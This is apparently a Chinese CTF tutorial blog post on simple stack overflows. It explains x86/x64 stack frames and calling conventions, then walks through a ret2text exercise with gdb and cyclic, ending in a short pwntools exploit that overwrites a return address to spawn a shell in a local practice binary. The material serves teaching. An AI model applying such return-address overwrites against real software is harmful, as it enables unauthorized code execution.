<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
  </script>

  <meta name="description" content="PWN-简单栈溢出介绍pwn这门课程简单来说就是通过二进制的形式去找到某台服务器存在哪些漏洞 与web不同的是他大部分的知识都是基于汇编组成的 在 CTF-Wiki 里面的介绍则是这样的:  栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞，类似的还有堆溢出，bss 段溢出等溢出方式。栈溢出漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="PWN-简单栈溢出">
<meta property="og:url" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/index.html">
<meta property="og:site_name" content="LeonChow">
<meta property="og:description" content="PWN-简单栈溢出介绍pwn这门课程简单来说就是通过二进制的形式去找到某台服务器存在哪些漏洞 与web不同的是他大部分的知识都是基于汇编组成的 在 CTF-Wiki 里面的介绍则是这样的:  栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞，类似的还有堆溢出，bss 段溢出等溢出方式。栈溢出漏洞">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530150427160.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530151556007.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530151756664.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/1f47c933242f43f4df4ea7487f699fc3.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530153731951.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530160001909.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530161550126.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530164438269.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530164633031.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530164851352.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530172005605.png">
<meta property="og:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530172320533.png">
<meta property="article:published_time" content="2025-05-30T06:58:02.000Z">
<meta property="article:modified_time" content="2025-06-06T04:58:05.208Z">
<meta property="article:author" content="Chow">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530150427160.png">

<link rel="canonical" href="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>PWN-简单栈溢出 | LeonChow</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="LeonChow" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">LeonChow</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://octodex.github.com/images/steroidtocat.png">
      <meta itemprop="name" content="Chow">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="LeonChow">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          PWN-简单栈溢出
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-05-30 14:58:02" itemprop="dateCreated datePublished" datetime="2025-05-30T14:58:02+08:00">2025-05-30</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-06-06 12:58:05" itemprop="dateModified" datetime="2025-06-06T12:58:05+08:00">2025-06-06</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="PWN-简单栈溢出"><a href="#PWN-简单栈溢出" class="headerlink" title="PWN-简单栈溢出"></a>PWN-简单栈溢出</h1><h1 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h1><p>pwn这门课程简单来说就是通过二进制的形式去找到某台服务器存在哪些漏洞 与web不同的是他大部分的知识都是基于汇编组成的 在 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/environment/">CTF-Wiki</a> 里面的介绍则是这样的:</p>
<blockquote>
<p>栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞，类似的还有堆溢出，bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃，重则可以使攻击者控制程序执行流程。此外，我们也不难发现，发生栈溢出的基本前提是：</p>
<ul>
<li>程序必须向栈上写入数据。</li>
<li>写入的数据大小没有被良好地控制。</li>
</ul>
</blockquote>
<span id="more"></span>
<p>则 栈的介绍如下：</p>
<h2 id="基本栈介绍-¶"><a href="#基本栈介绍-¶" class="headerlink" title="基本栈介绍 ¶"></a>基本栈介绍 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/stack-intro/#_2">¶</a></h2><blockquote>
<p>栈是一种典型的后进先出 (Last in First Out) 的数据结构，其操作主要有压栈 (push) 与出栈 (pop) 两种操作，如下图所示（维基百科）。两种操作都操作栈顶，当然，它也有栈底。</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530150427160.png" alt="image-20250530150427160"></p>
<p>高级语言在运行时都会被转换为汇编程序，在汇编程序运行过程中，充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间，其中某一部分就是该程序对应的栈，用于保存函数调用信息和局部变量。此外，常见的操作也是压栈与出栈。需要注意的是，<strong>程序的栈是从进程地址空间的高地址向低地址增长的</strong>。</p>
</blockquote>
<p>这些是简单的栈介绍</p>
<p>首先 栈是一种特殊的数据结构 他存储了 function runtime 的参数、变量和返回地址他在一次函数调用中是不可或缺的重要部分，其中软件的架构又分为两种</p>
<p><code>x86</code> 和 <code>x64 </code></p>
<p>这两种在参数和变量的在栈存储形式上有些不同 例如</p>
<p><code>x86</code> 的所有参数通过 <strong>栈</strong> 从右到左依次压入 可用以下代码作为示例 使用 <code>visual stdio</code> 编译 x86 版本观查栈</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">func</span><span class="params">(<span class="type">int</span> _param1, <span class="type">int</span> _param2, <span class="type">int</span> _param3, <span class="type">int</span> _param4, <span class="type">int</span> _param5)</span> </span>&#123;</span><br><span class="line">	<span class="keyword">return</span> _param1 + _param2 + _param3 + _param4 + _param5;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="built_in">func</span>(<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>);</span><br><span class="line">	std::cout &lt;&lt; <span class="string">&quot;helloworld\n&quot;</span>;</span><br><span class="line">	<span class="built_in">getchar</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530151556007.png" alt="image-20250530151556007"></p>
<p>如图所示 我们定位到了 <code>main</code> 函数 然后我们在 <code>func </code> 处下断点 我们让他继续执行到<code>func</code> 执行到 <code>call</code>的时候我们观察栈的变化</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530151756664.png" alt="image-20250530151756664"></p>
<p>如图所示 这是一个从低地址到高地址的显示方式 但是在入栈的时候 他是 <strong>从高地址到低地址从右往左参数依次入栈</strong></p>
<p>然后我们进入call继续查看 进入call的同时我们发现 他先是压入了一个地址 这个地址就是 call 所在地址 + 5 的字节</p>
<p>所以<code>call xxxxxxxx</code>就等效于 <code>push eip + 5</code> call的机器码占用一个字节 然而地址占用4个字节 其次又跳转到了 后面的地址处 所以call指令做了两件事 先是压入一个返回地址 接着又是进行了一次 <code>jmp</code> 跳转 然后我们接着看</p>
<p>在跳转过来的函数头部我们发现了两条指令 <code>push ebp</code> <code>mov ebp esp</code> 那么这是什么意思呢？</p>
<p>其实是 <code>典型的 x86 函数栈帧初始化</code> </p>
<p>首先将当前的 <code>ebp</code> 寄存器的值压入栈 也就是保存上个函数的栈底地址 <code>(push ebp)</code></p>
<p>之后把上个函数的栈顶作为当前函数的栈底 <code>(mov ebp esp)</code></p>
<p>之后就是进行一系类的加法操作 到了 <code>pop ebp</code>的时候 就要销毁此栈帧恢复上一个函数的栈帧了</p>
<p>然而我们可以发现 函数参数是通过 <code>ebp + n*4</code> 的方式进行访问的 这很关键</p>
<p>直到执行到 <code>ret</code> 我们会发现 他的效果就等于 <code>jmp esp &amp; add esp,4</code>   为什么这么说 我们接着分析栈</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/1f47c933242f43f4df4ea7487f699fc3.png" alt="1f47c933242f43f4df4ea7487f699fc3"></p>
<p>我们可以发现现在 <code>esp=ebp</code> 为什么说 <code>ret</code> 是 <code>jmp [esp]</code>呢</p>
<p>因为我们执行完 <code>pop ebp</code> 他就变成了这样</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530153731951.png" alt="image-20250530153731951"></p>
<p>也就是返回到刚才call保存的返回值了 </p>
<p>接着我们来看下<code>x64</code>的栈 </p>
<p>x64分为两种编译器 在 <code>Linux、FreeBSD、macOS</code> 中普遍使用 <code>System V AMD64 ABI</code> </p>
<ul>
<li>前六个整型或指针参数依次保存在 <strong>RDI, RSI, RDX, RCX, R8 和 R9 寄存器</strong>中，如果还有更多的参数的话才会保存在栈上。</li>
<li>内存地址不能大于 0x00007FFFFFFFFFFF，<strong>6 个字节长度</strong>，否则会抛出异常。</li>
</ul>
<p>但在<code>Windows</code>上是 <code>Microsoft x64 calling convention</code> 也称作：</p>
<ul>
<li><p>Windows x64 ABI</p>
</li>
<li><p>Windows x64 调用约定</p>
</li>
</ul>
<p>他的参数入栈形式如下</p>
<ul>
<li><p>前四个整型或指针参数依次保存在 <strong>RCX, RDX, R8, R9</strong>，如果还有更多的参数的话才会保存在栈上。</p>
</li>
<li><p>内存地址不能大于 0x00007FFFFFFFFFFF，<strong>6 个字节长度</strong>，否则会抛出异常。</p>
</li>
</ul>
<h2 id="🔍-System-V-AMD64-ABI-vs-Microsoft-x64-ABI-对比"><a href="#🔍-System-V-AMD64-ABI-vs-Microsoft-x64-ABI-对比" class="headerlink" title="🔍 System V AMD64 ABI vs Microsoft x64 ABI 对比"></a>🔍 System V AMD64 ABI vs Microsoft x64 ABI 对比</h2><table>
<thead>
<tr>
<th>特性</th>
<th>System V AMD64 ABI (Linux&#x2F;macOS)</th>
<th>Microsoft x64 ABI (Windows x64)</th>
</tr>
</thead>
<tbody><tr>
<td>参数传递寄存器</td>
<td>RDI, RSI, RDX, RCX, R8, R9</td>
<td>RCX, RDX, R8, R9</td>
</tr>
<tr>
<td>返回值</td>
<td>RAX</td>
<td>RAX</td>
</tr>
<tr>
<td>栈空间</td>
<td>被调用者必须保留 <code>red zone</code>（128 字节）</td>
<td>无 red zone（不能用栈下方空间）</td>
</tr>
<tr>
<td>调用者保存（volatile）寄存器</td>
<td>RAX, RCX, RDX, RSI, RDI, R8–R11</td>
<td>RAX, RCX, RDX, R8–R11</td>
</tr>
<tr>
<td>被调用者保存（callee-saved）</td>
<td>RBX, RBP, R12–R15</td>
<td>RBX, RBP, RDI, RSI, R12–R15</td>
</tr>
<tr>
<td>参数超过寄存器</td>
<td>从第 7 个参数起压栈</td>
<td>从第 5 个参数起压栈</td>
</tr>
<tr>
<td>栈对齐要求</td>
<td>16 字节</td>
<td>16 字节</td>
</tr>
<tr>
<td>栈传参对齐方式</td>
<td>按参数自然大小</td>
<td>所有参数按 8 字节对齐</td>
</tr>
<tr>
<td>谁清理栈</td>
<td>被调用者使用 <code>leave</code>+<code>ret</code></td>
<td>调用者清理（隐含对齐）</td>
</tr>
</tbody></table>
<p>我这边就用Windows用作演示</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530160001909.png" alt="image-20250530160001909"></p>
<p>我们也是执行到 <code>func</code> 下断点 然后我们进入这个call</p>
<p>我们会发现call的操作其实跟x86的call一样 也是 <code>push RIP + 5</code> 然后 <code>jmp 地址</code></p>
<p>但是这个地址并不是一个绝对地址而是 <strong>相对地址</strong>。</p>
<p><strong>相对地址跳转（RIP-relative）</strong></p>
<h2 id="🧮-实际跳转地址计算方式"><a href="#🧮-实际跳转地址计算方式" class="headerlink" title="🧮 实际跳转地址计算方式"></a>🧮 实际跳转地址计算方式</h2><blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">目标地址 = 下一条指令地址 + 偏移量</span><br><span class="line">偏移量 = 目标地址 - 下一条指令的地址</span><br><span class="line">下一条指令的地址 = 目标地址 - 偏移量</span><br></pre></td></tr></table></figure></blockquote>
<p>假设当前 <code>EIP</code> 为 <code>0x1000</code>，也就是 <code>E8</code> 的位置</p>
<p><code>E8</code> 占 1 字节，后面是 4 字节偏移量，下一条指令的地址是：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x1000</span> + <span class="number">5</span> = <span class="number">0x1005</span></span><br></pre></td></tr></table></figure>

<p>加上偏移量 <code>-0x97</code>：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x1005</span> - <span class="number">0x97</span> = <span class="number">0xF6E</span></span><br></pre></td></tr></table></figure>

<h2 id="为什么不用绝对地址？"><a href="#为什么不用绝对地址？" class="headerlink" title="为什么不用绝对地址？"></a>为什么不用绝对地址？</h2><p>因为：</p>
<ol>
<li><strong>可重定位性更强</strong>：相对寻址无关内存基地址，适合代码段被加载到任意地址；</li>
<li><strong>指令短</strong>：一个有符号 32 位偏移量足以跳转 ±2GB 的范围；</li>
<li><strong>兼容 RIP-relative 模型</strong>：x64 强调基于 <code>RIP</code> 的寻址方式；</li>
</ol>
<p>根据这张图我们可以计算下 <code>偏移量</code></p>
<p>也就是 目标地址(<code>00007FF76C6E15F0h</code>) - 下一条地址(<code>00007FF76C6E1687h</code>) &#x3D; 偏移量(<code>FFFF FFFF FFFF FF69h</code>)</p>
<p>因为要的是一个32位整数 我们要 截断 也就是 <code>FFFF FFFF FFFF FF69h</code> &amp; <code>FFFF FFFFh</code></p>
<p><code>&amp; 相同为1 不同为0</code></p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0xFFFFFFFFFFFFFF69</span> = <span class="number">11111111</span> <span class="number">11111111</span> <span class="number">11111111</span> <span class="number">11111111</span> <span class="number">11111111</span> <span class="number">11111111</span> <span class="number">11111111</span> <span class="number">01101001</span></span><br><span class="line"><span class="number">0x00000000FFFFFFFF</span> = <span class="number">00000000</span> <span class="number">00000000</span> <span class="number">00000000</span> <span class="number">00000000</span> <span class="number">11111111</span> <span class="number">11111111</span> <span class="number">11111111</span> <span class="number">11111111</span></span><br></pre></td></tr></table></figure>



<p>之后我们继续观察函数里面的内容</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530161550126.png" alt="image-20250530161550126"></p>
<p>我们会发现 这边没有<code>push rbp mov rbp rsp</code> 这是为什么呢</p>
<p>其实这是<strong>编译器优化</strong>的结果</p>
<p>在 <strong>x64 系统下，编译器不一定使用帧指针（<code>rbp</code>）</strong>，因为：</p>
<ul>
<li>x64 有更多寄存器可用（16 个通用寄存器），不需要保留 <code>rbp</code>；</li>
<li><code>rbp</code> 被当作普通寄存器用；</li>
<li>栈偏移通过 <code>rsp + 偏移</code> 就可以直接访问，不需要 <code>rbp</code>；</li>
<li>使用 <code>rbp</code> 反而浪费一个寄存器、增加指令数。</li>
</ul>
<p>首先就是拿出来参数放到栈上进行一系列加法之后到 <code>ret</code></p>
<p>这里就是 <code>jmp [esp]</code>的值了</p>
<p>至此对函数栈的简单介绍就到这里了 然后我们要思考一个问题 ​</p>
<p><strong>假如函数的参数的大小是八个字节 但是我们输入了过多的字符 导致该参数占用10个字节 这会导致什么问题呢？</strong>🤔</p>
<h1 id="栈溢出"><a href="#栈溢出" class="headerlink" title="栈溢出"></a>栈溢出</h1><p>没错 这就导致了过多的字符覆盖了低地址处的栈空间 然而这就是 <code>栈溢出</code>  这个问题导致的漏洞危害极大 如果我们可以把输入的字符覆盖到返回地址也就是call保存的返回值处 然后我们刚好可以构造出一段恶意代码 并且让他跳转到含有关键数据的函数 例如 system 或者 拿到了shell权限 对于我们的服务器来说是一场致命打击 💥</p>
<p>举个例子 假如我们手里刚好有一个这样的程序 刚好有一个可以被栈溢出的函数 我们可以用 <code>gdb</code>去测试一下</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530164438269.png" alt="image-20250530164438269"></p>
<p>根据图中所示 我们可以先用<code>gdb</code>加载 然后再 <code>main</code>函数上下个断点</p>
<p>我们输入 <code>r</code> 执行</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530164633031.png" alt="image-20250530164633031"></p>
<p>他断到了这里然后我们一直走到 <code>gets</code> 这个函数</p>
<p>为什么要走到 <code>gets</code> 呢 因为 <code>gets</code> 这个函数他是一个输入函数 他把值输入到了栈中 但是不限制输入大小 我们可以通过这个方式 去修改最后<code>ret</code>的值</p>
<p>在此之前我们需要通过 <code>cyclic</code> 指令生成一堆杂乱的数据 方便我们后续直接定位栈偏移</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530164851352.png" alt="image-20250530164851352"></p>
<p>使用 <code>ni</code> 指令单步</p>
<p>执行到 <code>ret</code> 指令我们就继续使用 <code>cyclic -l </code>去计算他的偏移</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530172005605.png" alt="image-20250530172005605"></p>
<p>然后这时候我们拿到了偏移量 那么怎么构造他的shell呢 这时候我们就要用 <code>pwntools</code> 了 <code>exp</code> 如下所示</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 载入库</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> * </span><br><span class="line"><span class="comment"># 打开进程</span></span><br><span class="line">p = process(<span class="string">&#x27;ret2text&#x27;</span>)</span><br><span class="line"><span class="comment"># 附加调试器</span></span><br><span class="line"><span class="comment"># gdb.attach(p) 可以观看流程</span></span><br><span class="line"><span class="comment"># 构建 payload</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">112</span>+p32(<span class="number">0x804863A</span>)</span><br><span class="line"><span class="comment"># 发送payload</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="comment"># 用户交互</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>执行之后是这样的</p>
<p><img src="/2025/05/30/PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA/image-20250530172320533.png" alt="image-20250530172320533"></p>
<h1 id="结束"><a href="#结束" class="headerlink" title="结束"></a>结束</h1>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/05/29/%E7%BC%96%E7%A0%81/" rel="prev" title="编码">
      <i class="fa fa-chevron-left"></i> 编码
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/05/31/%E5%85%B3%E4%BA%8ECheatEngine%E6%8F%90%E7%A4%BADBVM%E6%97%A0%E6%B3%95%E5%90%AF%E5%8A%A8%E4%BB%A5%E5%8F%8AVMware%E6%8F%90%E7%A4%BA%E6%AD%A4%E5%B9%B3%E5%8F%B0%E4%B8%8D%E6%94%AF%E6%8C%81%E8%99%9A%E6%8B%9F%E5%8C%96%E7%9A%84%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88/" rel="next" title="关于CheatEngine提示DBVM无法启动以及VMware提示此平台不支持虚拟化的解决方案">
      关于CheatEngine提示DBVM无法启动以及VMware提示此平台不支持虚拟化的解决方案 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
